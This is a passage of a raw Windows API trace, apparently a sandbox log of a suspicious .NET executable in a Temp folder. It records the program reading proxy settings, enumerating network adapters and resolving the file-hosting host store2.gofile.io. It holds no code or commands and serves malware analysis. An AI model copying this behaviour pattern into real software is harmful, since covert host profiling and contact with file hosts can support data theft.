"c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\9dc0.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x7fcb00 | out: lpFileInformation=0x7fcb00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0279.977] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\9DC0.exe.config", nBufferLength=0x105, lpBuffer=0x7fc480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\9DC0.exe.config", lpFilePart=0x0) returned 0x38 [0279.978] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\9DC0.exe.config" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\9dc0.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x7fcae8 | out: lpFileInformation=0x7fcae8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0279.978] GetCurrentProcess () returned 0xffffffffffffffff [0279.978] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x7fcc48 | out: TokenHandle=0x7fcc48*=0x328) returned 1 [0279.979] GetCurrentProcess () returned 0xffffffffffffffff [0279.979] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x7fcc48 | out: TokenHandle=0x7fcc48*=0x3cc) returned 1 [0279.992] GetCurrentProcess () returned 0xffffffffffffffff [0279.992] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x7fc998 | out: TokenHandle=0x7fc998*=0x2d0) returned 1 [0280.018] GetCurrentProcess () returned 0xffffffffffffffff [0280.018] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x7fc9a8 | out: TokenHandle=0x7fc9a8*=0x2d8) returned 1 [0280.046] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x7fc058 | out: phkResult=0x7fc058*=0x0) returned 0x2 [0280.052] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x7fee18 | out: phkResult=0x7fee18*=0x338) returned 0x0 [0280.053] RegQueryValueExW (in: hKey=0x338, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0x7fee58, lpData=0x0, lpcbData=0x7fee50*=0x0 | out: lpType=0x7fee58*=0x0, lpData=0x0, lpcbData=0x7fee50*=0x0) returned 0x2 [0280.053] RegCloseKey (hKey=0x338) returned 0x0 [0280.058] GetACP () returned 0x4e4 [0280.105] GetCurrentProcess () returned 0xffffffffffffffff [0280.105] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x7fe788 | out: TokenHandle=0x7fe788*=0x398) returned 1 [0280.107] GetCurrentProcess () returned 0xffffffffffffffff [0280.107] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x7fe798 | out: TokenHandle=0x7fe798*=0x380) returned 1 [0280.111] QueryPerformanceFrequency (in: lpFrequency=0x7ffaa9cc67f8 | out: lpFrequency=0x7ffaa9cc67f8*=100000000) returned 1 [0280.112] QueryPerformanceCounter (in: lpPerformanceCount=0x7fee08 | out: lpPerformanceCount=0x7fee08*=1202024650025) returned 1 [0280.118] GetCurrentProcess () returned 0xffffffffffffffff [0280.118] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x7fe688 | out: TokenHandle=0x7fe688*=0x330) returned 1 [0280.122] GetCurrentProcess () returned 0xffffffffffffffff [0280.122] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x7fe698 | out: TokenHandle=0x7fe698*=0x438) returned 1 [0280.140] GetCurrentProcess () returned 0xffffffffffffffff [0280.140] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x7fe6f8 | out: TokenHandle=0x7fe6f8*=0x348) returned 1 [0280.145] GetCurrentProcess () returned 0xffffffffffffffff [0280.145] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x7fe708 | out: TokenHandle=0x7fe708*=0x430) returned 1 [0280.151] GetCurrentProcess () returned 0xffffffffffffffff [0280.151] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x7febd8 | out: TokenHandle=0x7febd8*=0x344) returned 1 [0280.916] CoTaskMemAlloc (cb=0xcd0) returned 0xa17b90 [0280.918] RasEnumConnectionsW (in: param_1=0xa17b90, param_2=0x7feb80, param_3=0x7feb88 | out: param_1=0xa17b90, param_2=0x7feb80, param_3=0x7feb88) returned 0x0 [0280.941] CoTaskMemFree (pv=0xa17b90) [0280.984] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x7fe8d8 | out: lpWSAData=0x7fe8d8) returned 0 [0280.993] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x498 [0281.012] setsockopt (s=0x498, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0281.012] closesocket (s=0x498) returned 0 [0281.012] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x498 [0281.013] setsockopt (s=0x498, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0281.013] closesocket (s=0x498) returned 0 [0281.013] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x498 [0281.014] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x49c [0281.016] ioctlsocket (in: s=0x498, cmd=-2147195266, argp=0x7feba8 | out: argp=0x7feba8) returned 0 [0281.017] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4a0 [0281.017] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4a4 [0281.017] ioctlsocket (in: s=0x4a0, cmd=-2147195266, argp=0x7feba8 | out: argp=0x7feba8) returned 0 [0281.018] WSAIoctl (in: s=0x498, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x7feb30, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x7feb30, lpOverlapped=0x0) returned -1 [0281.021] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x7fe710, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0281.029] WSAEventSelect (s=0x498, hEventObject=0x49c, lNetworkEvents=512) returned 0 [0281.029] WSAIoctl (in: s=0x4a0, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x7feb30, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x7feb30, lpOverlapped=0x0) returned -1 [0281.029] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x7fe710, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0281.029] WSAEventSelect (s=0x4a0, hEventObject=0x4a4, lNetworkEvents=512) returned 0 [0281.029] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4ac [0281.032] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x4ac, param_3=0x3) returned 0x0 [0281.046] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x7fec18 | out: phkResult=0x7fec18*=0x4c4) returned 0x0 [0281.047] RegOpenKeyExW (in: hKey=0x4c4, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x7feb58 | out: phkResult=0x7feb58*=0x4c8) returned 0x0 [0281.047] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4cc [0281.047] RegNotifyChangeKeyValue (hKey=0x4c8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x4cc, fAsynchronous=1) returned 0x0 [0281.053] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x7feb60 | out: phkResult=0x7feb60*=0x4e4) returned 0x0 [0281.053] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4e8 [0281.053] RegNotifyChangeKeyValue (hKey=0x4e4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x4e8, fAsynchronous=1) returned 0x0 [0281.054] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x7feb60 | out: phkResult=0x7feb60*=0x4ec) returned 0x0 [0281.054] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4f0 [0281.054] RegNotifyChangeKeyValue (hKey=0x4ec, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x4f0, fAsynchronous=1) returned 0x0 [0281.054] GetCurrentProcess () returned 0xffffffffffffffff [0281.054] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x7feae8 | out: TokenHandle=0x7feae8*=0x4f4) returned 1 [0281.082] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x7fdc38 | out: phkResult=0x7fdc38*=0x4f8) returned 0x0 [0281.083] RegQueryValueExW (in: hKey=0x4f8, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0x7fdc78, lpData=0x0, lpcbData=0x7fdc70*=0x0 | out: lpType=0x7fdc78*=0x0, lpData=0x0, lpcbData=0x7fdc70*=0x0) returned 0x2 [0281.083] RegCloseKey (hKey=0x4f8) returned 0x0 [0281.094] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0xa0e1c0 [0281.105] WinHttpSetTimeouts (hInternet=0xa0e1c0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1 [0281.105] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x7feb60 | out: pProxyConfig=0x7feb60) returned 1 [0281.205] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_Disabled", lpBuffer=0x7fdc70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0281.205] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_MinCount", lpBuffer=0x7fdc70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0281.214] EtwEventRegister () returned 0x0 [0281.218] EtwEventSetInformation () returned 0x0 [0281.221] GetCurrentProcess () returned 0xffffffffffffffff [0281.221] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x7fe658 | out: TokenHandle=0x7fe658*=0x530) returned 1 [0281.223] GetCurrentProcess () returned 0xffffffffffffffff [0281.223] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x7fe668 | out: TokenHandle=0x7fe668*=0x53c) returned 1 [0281.227] EtwEventRegister () returned 0x0 [0281.227] EtwEventSetInformation () returned 0x0 [0281.261] SetEvent (hEvent=0x32c) returned 1 [0281.325] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x7fe8f0*=0x4ac, lpdwindex=0x7fe6c4 | out: lpdwindex=0x7fe6c4) returned 0x80010115 [0281.329] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x7fe8a0*=0x49c, lpdwindex=0x7fe674 | out: lpdwindex=0x7fe674) returned 0x80010115 [0281.329] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x7fe8a0*=0x4a4, lpdwindex=0x7fe674 | out: lpdwindex=0x7fe674) returned 0x80010115 [0281.330] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x7fe970*=0x4cc, lpdwindex=0x7fe744 | out: lpdwindex=0x7fe744) returned 0x80010115 [0281.330] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x7fe970*=0x4e8, lpdwindex=0x7fe744 | out: lpdwindex=0x7fe744) returned 0x80010115 [0281.330] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x7fe970*=0x4f0, lpdwindex=0x7fe744 | out: lpdwindex=0x7fe744) returned 0x80010115 [0281.337] GetCurrentProcess () returned 0xffffffffffffffff [0281.337] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x7fe5a8 | out: TokenHandle=0x7fe5a8*=0x558) returned 1 [0281.338] GetCurrentProcess () returned 0xffffffffffffffff [0281.338] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x7fe5b8 | out: TokenHandle=0x7fe5b8*=0x55c) returned 1 [0281.340] GetTimeZoneInformation (in: lpTimeZoneInformation=0x7fe930 | out: lpTimeZoneInformation=0x7fe930) returned 0x2 [0281.341] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x7fe748 | out: pTimeZoneInformation=0x7fe748) returned 0x2 [0281.346] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x7fe718 | out: phkResult=0x7fe718*=0x560) returned 0x0 [0281.347] RegQueryValueExW (in: hKey=0x560, lpValueName="TZI", lpReserved=0x0, lpType=0x7fe758, lpData=0x0, lpcbData=0x7fe750*=0x0 | out: lpType=0x7fe758*=0x3, lpData=0x0, lpcbData=0x7fe750*=0x2c) returned 0x0 [0281.347] RegQueryValueExW (in: hKey=0x560, lpValueName="TZI", lpReserved=0x0, lpType=0x7fe758, lpData=0x2ae8c20, lpcbData=0x7fe750*=0x2c | out: lpType=0x7fe758*=0x3, lpData=0x2ae8c20*, lpcbData=0x7fe750*=0x2c) returned 0x0 [0281.347] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x7fe528 | out: phkResult=0x7fe528*=0x0) returned 0x2 [0281.348] RegQueryValueExW (in: hKey=0x560, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x7fe6e8, lpData=0x0, lpcbData=0x7fe6e0*=0x0 | out: lpType=0x7fe6e8*=0x1, lpData=0x0, lpcbData=0x7fe6e0*=0x20) returned 0x0 [0281.348] RegQueryValueExW (in: hKey=0x560, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x7fe6e8, lpData=0x2ae9120, lpcbData=0x7fe6e0*=0x20 | out: lpType=0x7fe6e8*=0x1, lpData="@tzres.dll,-320", lpcbData=0x7fe6e0*=0x20) returned 0x0 [0281.348] RegQueryValueExW (in: hKey=0x560, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x7fe6e8, lpData=0x0, lpcbData=0x7fe6e0*=0x0 | out: lpType=0x7fe6e8*=0x1, lpData=0x0, lpcbData=0x7fe6e0*=0x20) returned 0x0 [0281.348] RegQueryValueExW (in: hKey=0x560, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x7fe6e8, lpData=0x2ae9190, lpcbData=0x7fe6e0*=0x20 | out: lpType=0x7fe6e8*=0x1, lpData="@tzres.dll,-322", lpcbData=0x7fe6e0*=0x20) returned 0x0 [0281.348] RegQueryValueExW (in: hKey=0x560, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x7fe6e8, lpData=0x0, lpcbData=0x7fe6e0*=0x0 | out: lpType=0x7fe6e8*=0x1, lpData=0x0, lpcbData=0x7fe6e0*=0x20) returned 0x0 [0281.348] RegQueryValueExW (in: hKey=0x560, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x7fe6e8, lpData=0x2ae9200, lpcbData=0x7fe6e0*=0x20 | out: lpType=0x7fe6e8*=0x1, lpData="@tzres.dll,-321", lpcbData=0x7fe6e0*=0x20) returned 0x0 [0281.350] CoTaskMemAlloc (cb=0x20c) returned 0x9a9220 [0281.350] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x9a9220 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0281.351] CoTaskMemFree (pv=0x9a9220) [0281.351] CoTaskMemAlloc (cb=0x20c) returned 0x9aafe0 [0281.351] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x7fe738, pwszFileMUIPath=0x9aafe0, pcchFileMUIPath=0x7fe740, pululEnumerator=0x7fe730 | out: pwszLanguage=0x0, pcchLanguage=0x7fe738, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x7fe740, pululEnumerator=0x7fe730) returned 1 [0281.357] CoTaskMemFree (pv=0x0) [0281.357] CoTaskMemFree (pv=0x9aafe0) [0281.358] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x920001 [0281.363] CoTaskMemAlloc (cb=0x3ec) returned 0xa20a20 [0281.363] LoadStringW (in: hInstance=0x920001, uID=0x140, lpBuffer=0xa20a20, cchBufferMax=500 | out: lpBuffer="(UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna") returned 0x3c [0281.364] CoTaskMemFree (pv=0xa20a20) [0281.365] FreeLibrary (hLibModule=0x920001) returned 1 [0281.366] CoTaskMemAlloc (cb=0x20c) returned 0x9a9220 [0281.367] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x9a9220 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0281.367] CoTaskMemFree (pv=0x9a9220) [0281.367] CoTaskMemAlloc (cb=0x20c) returned 0x9aafe0 [0281.367] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x7fe738, pwszFileMUIPath=0x9aafe0, pcchFileMUIPath=0x7fe740, pululEnumerator=0x7fe730 | out: pwszLanguage=0x0, pcchLanguage=0x7fe738, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x7fe740, pululEnumerator=0x7fe730) returned 1 [0281.372] CoTaskMemFree (pv=0x0) [0281.373] CoTaskMemFree (pv=0x9aafe0) [0281.373] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x920001 [0281.377] CoTaskMemAlloc (cb=0x3ec) returned 0xa20a20 [0281.377] LoadStringW (in: hInstance=0x920001, uID=0x142, lpBuffer=0xa20a20, cchBufferMax=500 | out: lpBuffer="W. Europe Standard Time") returned 0x17 [0281.377] CoTaskMemFree (pv=0xa20a20) [0281.377] FreeLibrary (hLibModule=0x920001) returned 1 [0281.377] CoTaskMemAlloc (cb=0x20c) returned 0x9a9220 [0281.377] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x9a9220 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0281.378] CoTaskMemFree (pv=0x9a9220) [0281.378] CoTaskMemAlloc (cb=0x20c) returned 0x9a9220 [0281.378] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x7fe738, pwszFileMUIPath=0x9a9220, pcchFileMUIPath=0x7fe740, pululEnumerator=0x7fe730 | out: pwszLanguage=0x0, pcchLanguage=0x7fe738, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x7fe740, pululEnumerator=0x7fe730) returned 1 [0281.385] CoTaskMemFree (pv=0x0) [0281.385] CoTaskMemFree (pv=0x9a9220) [0281.385] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x920001 [0281.388] CoTaskMemAlloc (cb=0x3ec) returned 0xa20a20 [0281.388] LoadStringW (in: hInstance=0x920001, uID=0x141, lpBuffer=0xa20a20, cchBufferMax=500 | out: lpBuffer="W. Europe Daylight Time") returned 0x17 [0281.388] CoTaskMemFree (pv=0xa20a20) [0281.388] FreeLibrary (hLibModule=0x920001) returned 1 [0281.389] RegCloseKey (hKey=0x560) returned 0x0 [0281.390] SetEvent (hEvent=0x32c) returned 1 [0281.405] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x7feb18 | out: pFixedInfo=0x0, pOutBufLen=0x7feb18) returned 0x6f [0281.680] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x98f920 [0281.680] GetNetworkParams (in: pFixedInfo=0x98f920, pOutBufLen=0x7feb18 | out: pFixedInfo=0x98f920, pOutBufLen=0x7feb18) returned 0x0 [0281.691] LocalFree (hMem=0x98f920) returned 0x0 [0281.694] CoTaskMemAlloc (cb=0x20c) returned 0xa1d700 [0281.694] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_Disabled", lpBuffer=0xa1d700, nSize=0x104 | out: lpBuffer="") returned 0x0 [0281.695] CoTaskMemFree (pv=0xa1d700) [0281.695] CoTaskMemAlloc (cb=0x20c) returned 0xa1d700 [0281.695] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_MinCount", lpBuffer=0xa1d700, nSize=0x104 | out: lpBuffer="") returned 0x0 [0281.695] CoTaskMemFree (pv=0xa1d700) [0281.716] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x59c [0281.718] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x574 [0281.719] GetAddrInfoW (in: pNodeName="store2.gofile.io", pServiceName=0x0, pHints=0x7fe988*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7fe8d0 | out: ppResult=0x7fe8d0*=0x9cb370*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="store2.gofile.io", ai_addr=0xa04e00*(sa_family=2, sin_port=0x0, sin_addr="31.14.69.10"), ai_next=0x0)) returned 0 [0281.778] FreeAddrInfoW (pAddrInfo=0x9cb370*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="store2.gofile.io", ai_addr=0xa04e00*(sa_family=2, sin_port=0x0, sin_addr="31.14.69.10"), ai_next=0x0)) [0281.820] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5cc [0281.820] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5d0 [0281.821] ioctlsocket (in: s=0x5cc, cmd=-2147195266, argp=0x7fe8f8 | out: argp=0x7fe8f8) returned 0 [0281.821] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5d4 [0281.821] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5d8 [0281.821] ioctlsocket (in: s=0x5d4, cmd=-2147195266, argp=0x7fe8f8 | out: argp=0x7fe8f8) returned 0 [0281.821] WSAIoctl (in: s=0x5cc, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x7fe880, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x7fe880, lpOverlapped=0x0) returned -1 [0281.821] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x7fe460, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0281.821] WSAEventSelect (s=0x5cc, hEventObject=0x5d0, lNetworkEvents=512) returned 0 [0281.821] WSAIoctl (in: s=0x5d4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x7fe880, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x7fe880, lpOverlapped=0x0) returned -1 [0281.821] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x7fe460, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0281.821] WSAEventSelect (s=0x5d4, hEventObject=0x5d8, lNetworkEvents=512) returned 0 [0281.821] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x7fe8e8*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x7fe8e8*=0xc20) returned 0x6f [0281.871] LocalAlloc (uFlags=0x0, uBytes=0xc20) returned 0xb365f0 [0281.871] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0xb365f0, SizePointer=0x7fe8e8*=0xc20 | out: AdapterAddresses=0xb365f0*(Alignment=0x5000001c0, Length=0x1c0, IfIndex=0x5, Next=0xb36908, AdapterName="{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}", FirstUnicastAddress=0xb36858, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection", FriendlyName="Ethernet", PhysicalAddress=([0]=0xe0, [1]=0x3c, [2]=0x5b, [3]=0xcc, [4]=0x88, [5]=0xff, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x1c5, DdnsEnabled=0x1c5, RegisterAdapterSuffix=0x1c5, Dhcpv4Enabled=0x1c5, ReceiveOnly=0x1c5, NoMulticast=0x1c5, Ipv6OtherStatefulConfig=0x1c5, NetbiosOverTcpipEnabled=0x1c5, Ipv4Enabled=0x1c5, Ipv6Enabled=0x1c5, Ipv6ManagedAddressConfigurationSupported=0x1c5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0x5, ZoneIndices=([0]=0x5, [1]=0x5, [2]=0x5, [3]=0x5, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6008000000000, Dhcpv4Server.lpSockaddr=0xb367b0*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11eb6c9dc20d55b0, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x28, [5]=0xb6, [6]=0x28, [7]=0x5e, [8]=0x0, [9]=0xf, 